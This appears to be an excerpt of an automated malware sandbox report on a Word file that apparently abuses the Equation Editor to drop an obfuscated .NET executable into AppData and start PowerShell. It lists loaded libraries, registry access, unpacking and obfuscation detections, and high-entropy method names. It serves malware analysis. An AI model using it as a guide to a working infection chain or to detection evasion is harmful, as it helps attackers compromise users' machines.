Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dwmapi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: version.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: secur32.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: winhttp.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: webio.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: winnsi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: nlaapi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: bcrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: bcrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: credssp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64win.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: msi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32 Jump to behavior
Source: na.LNK.0.dr LNK file: ..\..\..\..\..\Desktop\na.doc
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems Jump to behavior
Source: na.doc Static file information: File size 2531309 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, mLeaogvoINC8aveRgP.cs .Net Code: vsx5rZLaxx System.Reflection.Assembly.Load(byte[])
Source: 5.2.cmnjgwhesilo61000.exe.610000.0.raw.unpack, Uo.cs .Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, mLeaogvoINC8aveRgP.cs .Net Code: vsx5rZLaxx System.Reflection.Assembly.Load(byte[])
Source: 5.2.cmnjgwhesilo61000.exe.3660770.5.raw.unpack, Uo.cs .Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_00606666 push eax; ret 2_2_00606667
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_00607669 push eax; ret 2_2_0060766B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0060606A push ecx; ret 2_2_0060606B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0060607A push ecx; ret 2_2_0060607B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0060605A push ecx; ret 2_2_0060605B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0060665E push ecx; ret 2_2_0060665F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0060102A push eax; retn 005Fh 2_2_00601001
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0060602F push ecx; ret 2_2_0060603B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0060600A push ecx; ret 2_2_0060600B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_00607C0E push edx; ret 2_2_00607C0F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0060600F push ecx; ret 2_2_0060601B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_00607C16 push edx; ret 2_2_00607C17
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_00605EED push edx; ret 2_2_00605EEF
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_006076C9 push ecx; ret 2_2_006076CB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_006076D1 push ecx; ret 2_2_006076D3
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_006060AA push ecx; ret 2_2_006060AB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_00605AB6 push edx; ret 2_2_00605AB7
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_006060BA push ecx; ret 2_2_006060BB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0060629E push eax; ret 2_2_0060629F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_005F8F44 push eax; retf 2_2_005F8F61
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_005EF739 push esi; ret 2_2_005EF747
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_00605BE8 push edx; ret 2_2_00605BEB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_00605BF0 push edx; ret 2_2_00605BF3
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_00605FFA push ecx; ret 2_2_00605FFB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_00605FB8 push ecx; ret 2_2_00605FBB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_00600FBA push eax; retn 005Fh 2_2_00601001
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_002B21E9 push ebx; iretd 7_2_002B21EA
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_005690F8 pushfd ; retn 0050h 7_2_005690F9
Source: pKL9HXcZosWfPt1[1].exe.2.dr Static PE information: section name: .text entropy: 7.956972299171152
Source: cmnjgwhesilo61000.exe.2.dr Static PE information: section name: .text entropy: 7.956972299171152
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, gNQbaWLXsFaFvpBXJi.cs High entropy of concatenated method names: 'A1MERoALPq', 'GiHEt1Hr9h', 'KwyEqnGTFi', 'VeoEFK9lXd', 'gpLEaxnXY0', 'pkFqx5bHs7', 'M65qne5uXo', 'GJoqMUjjBq', 'zpKqe3ykUl', 'iQpq6ZHv6q'
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, CBhtpuZu0niEWFG3RD.cs High entropy of concatenated method names: 'e5MqAX3kPe', 'SLmqQDsluC', 'rjbYJ7cfPj', 'XuXY2vpy45', 'st8YZ99L1C', 'fOAY3wg2xN', 'Iw7YUTx09q', 'SgBYIHenRP', 'h34Y7lviMZ', 'mJoYsCjsbb'
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, lV3xFKccCDLii0K48Q.cs High entropy of concatenated method names: 'iuPwFPnNes', 'pXnwad1res', 'vmww1jHKSO', 'SgbwXVSKPO', 'I2RwCZSOV7', 'o8dwgMcWC2', 'xGasU0GJAuQZseLmNY', 'TZWRsL61575LQxHXhB', 'imWwwvBiAF', 'Q08wKGXcvi'
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, rFI1jpkhIAM5j1q8U4.cs High entropy of concatenated method names: 'VCSOwoxDBl', 'Ry5OKGjGBa', 'lFYO5JiGPR', 'aFgOB6ZjWJ', 'CgBOtTRCud', 'NjXOqptwhF', 'hi7OEfp125', 'OO7pMxKjNv', 'vcNpe2oPof', 'f0Vp6HQ4Ip'
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, FoIYebzQm2hqfWSd7X.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 't0nOT3ehp6', 'jioOCxGbc7', 'CNHOg57oXi', 'BlcOjLqOVO', 'DoOOpmSQXR', 'BDeOOckvLr', 'K0xOkHHP2W'
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, qG8HKrNydjl44Zvrcy.cs High entropy of concatenated method names: 'ToString', 'EM6gm9T5Vu', 'SmYgGIKJdf', 'POegJiep7d', 'uGKg26KVuj', 'PbOgZtR3sP', 'jl5g3k8wXT', 'uQDgUq5b9v', 'dPfgIUmInk', 'Gaog7rE6v9'
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, Ue6mJ2s3lb0V1AYBRp.cs High entropy of concatenated method names: 'Dispose', 'ltXw6NZrJJ', 'OOTbG9JaEg', 'b4q44GyQFo', 'c7rwWq6p4l', 'VoowzRPxNg', 'ProcessDialogKey', 'aQUbuPGRpy', 'yaDbw4OZTY', 'T2DbbqVEgx'
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, RhLUmQgqaEfGqR2hvw.cs High entropy of concatenated method names: 'hnJpyj7aNG', 'RM9pGGbHeq', 'QCYpJrd2Hr', 'ntbp2EyfC1', 'UOspvLorD4', 'F1ppZESVYw', 'Next', 'Next', 'Next', 'NextBytes'
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, BV89Ny39oFva95VeBk.cs High entropy of concatenated method names: 'HibYo2lmaD', 'EdtYDw3Vfw', 'wO2Y9osDOY', 'dXvYdrGj6q', 'HSRYCchewG', 'oWQYghvhis', 'xIqYjaZ1uK', 'gNjYpfF21c', 'C8AYOwGECx', 'vudYkaqj3m'
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, mLeaogvoINC8aveRgP.cs High entropy of concatenated method names: 'vjPKREFlQe', 'Kd1KBC6ToO', 'q3UKtUPnqc', 'd2BKYoHTP5', 'R4IKqgqXM6', 'RNBKEJoxll', 'rP5KFCXpSt', 'xTCKaF5Ln5', 'cr7KNP6fM5', 'AX4K1El6CM'
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, yR4F7uBJmXcJCfaA9e.cs High entropy of concatenated method names: 'Q4MpBI4xHu', 'BdrptD2sjy', 'VRPpYVcN9N', 'KcQpq7cury', 'qytpEK9mK5', 'GWMpFGK1cU', 'iUnpaWRoRy', 'j5ZpNdubDn', 'jMvp1xugNM', 'zNipXoS9pA'
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, fNsjdUyrnXvaMejHKy9.cs High entropy of concatenated method names: 'eOJOHrcED0', 'p6pOStTCnI', 'n2LOrL3s5t', 'Tr5OoCL6gA', 'ARtOA8ytJc', 'O8WODLsklC', 'PJMOQqKAAb', 'jNjO9Hwx23', 'bJeOdDVWvh', 'pRhOVoKNyD'
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, hxMIVi9pYAP9wjI5QI.cs High entropy of concatenated method names: 'f2htvXocjg', 'Qg2t0w5yGU', 'u6dth0dfFA', 'XmDtfnft9S', 'exNtx4y9fN', 'RULtnB62XS', 'w54tMMEHtY', 'ilvte88d0I', 'Y1et6FBMIR', 'jaqtWFVlnC'
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, sMGxPejB33K4rx4e60.cs High entropy of concatenated method names: 'qC0j11vu2K', 'GHmjXXx72h', 'ToString', 'PdTjBWSJb1', 'Ql9jtLrUKK', 'fVmjYqY4vc', 'ew9jqy5lDb', 'bJFjEVEBdR', 'SHZjFESWjh', 'ixJjaEjB6d'
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, Lf7MXhdeXPWlJnHyOp.cs High entropy of concatenated method names: 'i2ICsm95uJ', 'LtOCLJwBxR', 'jjmCvZmcNf', 'AuWC07Bv7n', 'RqvCGYpVT0', 'CIZCJhnlcU', 'bBcC2WJUEq', 'umUCZLi7Bs', 'cbJC3bnWD1', 'h4mCUkPmdl'
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, KK71ylRYJPdeoYpMtn.cs High entropy of concatenated method names: 'ycBT9AyCP7', 'j0NTdnfp1a', 'o0fTy158Tf', 'RriTGdjIJq', 'vHmT2YDqhn', 'O4TTZ813rL', 'U9jTUpe6Dn', 'n7oTIfkPF7', 'NnyTsy0TV9', 'n1pTmgniZE'
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, qjttoFyyDt8gYvxevtf.cs High entropy of concatenated method names: 'ToString', 'cZ1kKaaDby', 'zUdk5tGSeC', 'no7kRlJrX7', 'vy4kBpgQUO', 'zQ0kt3VDr1', 'DyDkYEXShQ', 'egVkqKU9qU', 'UUYDIbHc4FHgyHFDxvS', 'xIp0TKHswrKIbyeyXLT'
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, JpIAI22TPeuUCKgw8d.cs High entropy of concatenated method names: 'QErjekxGsZ', 'FXhjWQyDmo', 'uQupuUm1v5', 'S0RpwsuMRZ', 'f3Bjm4OOhC', 'vQxjL8L1ZE', 'i1fjiirOpo', 'RWCjvWaHgx', 'wwmj0uFIeH', 'naOjhQR9xY'
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, CLs2kbe5U6HxbH6rln.cs High entropy of concatenated method names: 'omJrZCkSS', 'jeVoNhX4p', 'xyoDYsKFj', 'UxdQO28Iw', 'uIpdCS53K', 'T9fVMTmhm', 'WBwQXkVKTkThYvZHLr', 'RFLe8WPpMjZEWFxkU2', 'FrkpCpO16', 'UhWkcY0Hl'
Source: 5.2.cmnjgwhesilo61000.exe.88c0000.6.raw.unpack, Ur1wr2Gv8belLDObbn.cs High entropy of concatenated method names: 'wegFHqPAJM', 'XGlFSBl5yl', 'zqQFrTKaqr', 'YcLFo8ePl0', 'QhHFARDUvD', 'VCjFDpbGgb', 'wtbFQ0V1KY', 'RrfF9aT53D', 'UaGFdLNjZi', 'nsJFV0l2up'
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, gNQbaWLXsFaFvpBXJi.cs High entropy of concatenated method names: 'A1MERoALPq', 'GiHEt1Hr9h', 'KwyEqnGTFi', 'VeoEFK9lXd', 'gpLEaxnXY0', 'pkFqx5bHs7', 'M65qne5uXo', 'GJoqMUjjBq', 'zpKqe3ykUl', 'iQpq6ZHv6q'
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, CBhtpuZu0niEWFG3RD.cs High entropy of concatenated method names: 'e5MqAX3kPe', 'SLmqQDsluC', 'rjbYJ7cfPj', 'XuXY2vpy45', 'st8YZ99L1C', 'fOAY3wg2xN', 'Iw7YUTx09q', 'SgBYIHenRP', 'h34Y7lviMZ', 'mJoYsCjsbb'
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, lV3xFKccCDLii0K48Q.cs High entropy of concatenated method names: 'iuPwFPnNes', 'pXnwad1res', 'vmww1jHKSO', 'SgbwXVSKPO', 'I2RwCZSOV7', 'o8dwgMcWC2', 'xGasU0GJAuQZseLmNY', 'TZWRsL61575LQxHXhB', 'imWwwvBiAF', 'Q08wKGXcvi'
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, rFI1jpkhIAM5j1q8U4.cs High entropy of concatenated method names: 'VCSOwoxDBl', 'Ry5OKGjGBa', 'lFYO5JiGPR', 'aFgOB6ZjWJ', 'CgBOtTRCud', 'NjXOqptwhF', 'hi7OEfp125', 'OO7pMxKjNv', 'vcNpe2oPof', 'f0Vp6HQ4Ip'
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, FoIYebzQm2hqfWSd7X.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 't0nOT3ehp6', 'jioOCxGbc7', 'CNHOg57oXi', 'BlcOjLqOVO', 'DoOOpmSQXR', 'BDeOOckvLr', 'K0xOkHHP2W'
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, qG8HKrNydjl44Zvrcy.cs High entropy of concatenated method names: 'ToString', 'EM6gm9T5Vu', 'SmYgGIKJdf', 'POegJiep7d', 'uGKg26KVuj', 'PbOgZtR3sP', 'jl5g3k8wXT', 'uQDgUq5b9v', 'dPfgIUmInk', 'Gaog7rE6v9'
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, Ue6mJ2s3lb0V1AYBRp.cs High entropy of concatenated method names: 'Dispose', 'ltXw6NZrJJ', 'OOTbG9JaEg', 'b4q44GyQFo', 'c7rwWq6p4l', 'VoowzRPxNg', 'ProcessDialogKey', 'aQUbuPGRpy', 'yaDbw4OZTY', 'T2DbbqVEgx'
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, RhLUmQgqaEfGqR2hvw.cs High entropy of concatenated method names: 'hnJpyj7aNG', 'RM9pGGbHeq', 'QCYpJrd2Hr', 'ntbp2EyfC1', 'UOspvLorD4', 'F1ppZESVYw', 'Next', 'Next', 'Next', 'NextBytes'
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, BV89Ny39oFva95VeBk.cs High entropy of concatenated method names: 'HibYo2lmaD', 'EdtYDw3Vfw', 'wO2Y9osDOY', 'dXvYdrGj6q', 'HSRYCchewG', 'oWQYghvhis', 'xIqYjaZ1uK', 'gNjYpfF21c', 'C8AYOwGECx', 'vudYkaqj3m'
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, mLeaogvoINC8aveRgP.cs High entropy of concatenated method names: 'vjPKREFlQe', 'Kd1KBC6ToO', 'q3UKtUPnqc', 'd2BKYoHTP5', 'R4IKqgqXM6', 'RNBKEJoxll', 'rP5KFCXpSt', 'xTCKaF5Ln5', 'cr7KNP6fM5', 'AX4K1El6CM'
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, yR4F7uBJmXcJCfaA9e.cs High entropy of concatenated method names: 'Q4MpBI4xHu', 'BdrptD2sjy', 'VRPpYVcN9N', 'KcQpq7cury', 'qytpEK9mK5', 'GWMpFGK1cU', 'iUnpaWRoRy', 'j5ZpNdubDn', 'jMvp1xugNM', 'zNipXoS9pA'
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, fNsjdUyrnXvaMejHKy9.cs High entropy of concatenated method names: 'eOJOHrcED0', 'p6pOStTCnI', 'n2LOrL3s5t', 'Tr5OoCL6gA', 'ARtOA8ytJc', 'O8WODLsklC', 'PJMOQqKAAb', 'jNjO9Hwx23', 'bJeOdDVWvh', 'pRhOVoKNyD'
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, hxMIVi9pYAP9wjI5QI.cs High entropy of concatenated method names: 'f2htvXocjg', 'Qg2t0w5yGU', 'u6dth0dfFA', 'XmDtfnft9S', 'exNtx4y9fN', 'RULtnB62XS', 'w54tMMEHtY', 'ilvte88d0I', 'Y1et6FBMIR', 'jaqtWFVlnC'
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, sMGxPejB33K4rx4e60.cs High entropy of concatenated method names: 'qC0j11vu2K', 'GHmjXXx72h', 'ToString', 'PdTjBWSJb1', 'Ql9jtLrUKK', 'fVmjYqY4vc', 'ew9jqy5lDb', 'bJFjEVEBdR', 'SHZjFESWjh', 'ixJjaEjB6d'
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, Lf7MXhdeXPWlJnHyOp.cs High entropy of concatenated method names: 'i2ICsm95uJ', 'LtOCLJwBxR', 'jjmCvZmcNf', 'AuWC07Bv7n', 'RqvCGYpVT0', 'CIZCJhnlcU', 'bBcC2WJUEq', 'umUCZLi7Bs', 'cbJC3bnWD1', 'h4mCUkPmdl'
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, KK71ylRYJPdeoYpMtn.cs High entropy of concatenated method names: 'ycBT9AyCP7', 'j0NTdnfp1a', 'o0fTy158Tf', 'RriTGdjIJq', 'vHmT2YDqhn', 'O4TTZ813rL', 'U9jTUpe6Dn', 'n7oTIfkPF7', 'NnyTsy0TV9', 'n1pTmgniZE'
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, qjttoFyyDt8gYvxevtf.cs High entropy of concatenated method names: 'ToString', 'cZ1kKaaDby', 'zUdk5tGSeC', 'no7kRlJrX7', 'vy4kBpgQUO', 'zQ0kt3VDr1', 'DyDkYEXShQ', 'egVkqKU9qU', 'UUYDIbHc4FHgyHFDxvS', 'xIp0TKHswrKIbyeyXLT'
